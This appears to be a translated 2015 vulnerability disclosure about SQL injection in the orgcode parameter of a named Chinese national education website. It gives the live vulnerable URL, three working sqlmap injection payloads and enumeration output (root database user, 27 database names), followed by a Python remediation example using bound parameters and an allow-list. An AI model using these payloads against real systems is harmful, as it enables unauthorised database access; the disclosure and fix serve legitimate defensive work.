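2015-02-02: Details reported to the vendor; awaiting vendor handling
2015-02-06: Vendor confirmed; details disclosed only to the vendor
2015-02-16: Details disclosed to core white hats and experts in related fields
2015-02-26: Details disclosed to regular white hats
2015-03-08: Details disclosed to trainee white hats
2015-03-19: Details disclosed to the public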
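About to level up, so excited.
The Integrated Education and Teaching Application System of the National Center for Educational Technology (中央电化教育馆): its network space site, http://rrt.cer.com.cn/, has an injection at:
http://rrt.cer.com.cn/schoolspace.php?orgcode=0000000000'
Error message: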
Sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orgcode
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: orgcode=0000000000' RLIKE (SELECT (CASE WHEN (1188=1188) THEN 0000000000 ELSE 0x28 END)) AND 'GKjO'='GKjO

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: orgcode=0000000000' AND (SELECT 9207 FROM(SELECT COUNT(*),CONCAT(0x7173757871,(SELECT (CASE WHEN (9207=9207) THEN 1 ELSE 0 END)),0x7161706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NKxj'='NKxj

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: orgcode=-9235' OR 9918=SLEEP(5) AND 'JlZF'='JlZF
---
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL >= 5.0.0
current user:    'root@%'
current database:    'rrt_home'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
All databases:
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL >= 5.0.0
available databases [27]:
[*] content_editor
[*] hxdp
[*] information_schema
[*] jse_app
[*] jse_ask
[*] jse_base
[*] jse_cardsum
[*] jse_chelp
[*] jse_cms
[*] jse_contents
[*] jse_module
[*] jse_pay
[*] jse_platform
[*] jse_record
[*] jse_resources
[*] jse_school
[*] jse_school_room
[*] jse_second
[*] jse_shorturl
[*] jse_storage
[*] jse_usercenter
[*] mysql
[*] performance_schema
[*] rrt_center
[*] rrt_home
[*] sitecounter
[*] test
Tables:
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL >= 5.0.0
Database: rrt_home
[152 tables]
No further operations were performed.
As above.
Filter the input.
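The fix the report asks for, as an added example that is not code from the report or from the affected site: an allow-list check on `orgcode` followed by a bound-parameter query, next to the concatenated form that the quote probe breaks. Python and `sqlite3` stand in for the site's PHP and MySQL; the `school` table, the ten-digit rule and all function names are assumptions.

```python
import re
import sqlite3

# Assumption: an organisation code is exactly ten ASCII digits, like the
# 0000000000 value in the reported URL.
ORGCODE_RE = re.compile(r"[0-9]{10}")
PROBE = "0000000000'"  # the quote-suffixed value from the report


def make_db():
    """Constructed stand-in table; the site's real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE school (orgcode TEXT PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO school VALUES ('0000000000', 'Demo School')")
    return db


def lookup_concatenated(db, orgcode):
    """Before: the value is spliced into the SQL text, so a quote ends the literal."""
    return db.execute(
        "SELECT name FROM school WHERE orgcode = '" + orgcode + "'").fetchall()


def lookup_bound(db, orgcode):
    """After: the value travels as a bound parameter and is only ever data."""
    return db.execute(
        "SELECT name FROM school WHERE orgcode = ?", (orgcode,)).fetchall()


def handle_request(db, orgcode):
    """Allow-list check first (None = reject, e.g. HTTP 400), then the bound query."""
    if not isinstance(orgcode, str) or ORGCODE_RE.fullmatch(orgcode) is None:
        return None
    return lookup_bound(db, orgcode)


def breaks_statement(db, orgcode):
    """True when the value alters the concatenated statement's syntax."""
    try:
        lookup_concatenated(db, orgcode)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    print(breaks_statement(db, PROBE), lookup_bound(db, PROBE), handle_request(db, PROBE))
```

Separately from the query fix, the `current user: 'root@%'` line in the sqlmap output means the application connects with the database's administrative account; an account limited to the schema the site needs would have kept the other listed databases out of reach.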
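Severity: High
Vulnerability Rank: 11
Confirmed: 2015-02-06 09:51
CNVD confirmed and reproduced the situation described, and has notified the website's administrator (the software vendor) through the contact information published on the website (or through a previously established handling channel).
None yet.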